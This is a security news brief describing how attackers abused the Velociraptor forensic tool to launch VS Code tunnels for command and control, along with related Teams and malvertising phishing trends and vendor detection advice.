Attackers turn Velociraptor into a C2 taxi

• What happened: Researchers spotted attackers installing the open-source forensic tool Velociraptor and then using it to fetch and run Visual Studio Code in “tunnel” mode—turning a developer editor into a handy route back to an attacker-controlled C2 server.
• How they got in: Windows msiexec pulled an MSI from a Cloudflare Workers domain to install Velociraptor, which then contacted another Workers domain. From there an encoded PowerShell command downloaded VS Code, launched with tunnelling enabled, and further payloads (including Cloudflare Tunnel and Radmin) were retrieved the same way.
• Why it matters: Using incident-response tools as part of the attack chain is an evolution of “living off the land”. Sophos advises watching for unauthorised Velociraptor use as a likely pre-ransomware signal and tightening EDR, monitoring and backup practices.
• Wider trend: Separate research highlights Microsoft Teams being abused for initial access (IT-helpdesk impersonation, remote-access tools, PowerShell payloads) and a malvertising twist that leverages office.com redirects via ADFS to deliver convincing Microsoft 365 phishing pages.
Vendor response: Rapid7, which maintains Velociraptor, acknowledged the misuse and published detection tips: check the Velociraptor Application event log (Event ID 1000 with command-line args), look for changes to the Velociraptor EventLog registry key, and flag execution of unsigned Velociraptor binaries.

Threat actors are getting creative. Instead of dropping obvious malware, they’re installing Velociraptor—a perfectly legitimate incident-response tool—and using it to download Visual Studio Code and flip on its tunnelling feature. Yes, your code editor just became a backdoor. How very 2025.

How the caper works
1. msiexec grabs an installer from a Cloudflare Workers domain.
2. That MSI puts Velociraptor on the box and phones home to another Workers address.
3. Velociraptor is then used to fetch VS Code, started with tunnelling enabled, giving the attacker remote access and execution.
4. Extra goodies (like Cloudflare Tunnel and Radmin) can be pulled in the same way. Cheeky.

Why you should care
This is “living off the land” with a twist: abusing defenders’ tools to avoid suspicion. According to researchers, unapproved Velociraptor activity can be a pre-ransomware tell. Keep calm, but don’t ignore it.

The wider pattern
• Microsoft Teams lures are booming—attackers pose as IT support, get you to install remote-access tools, then drop PowerShell payloads.
• Malvertising is also having a moment: sponsored links redirect via ADFS to convincing Microsoft 365 phishing pages—harder to spot, easier to click. Mind the link.

What to do (right now)
• Hunt for Velociraptor misuse:
○ Check the Application log for Velociraptor Event ID 1000 and review the command-line arguments.
○ Monitor for changes to the Velociraptor EventLog registry key.
○ Be suspicious of unsigned Velociraptor binaries.
• Harden endpoints: EDR tuned for unexpected tools and odd parent/child processes; watch for msiexec + Workers domains + encoded PowerShell.
Prepare for phishing on new fronts: Train users to challenge Teams “IT support” DMs and review ad-blocking/allow-listing to counter malvertising.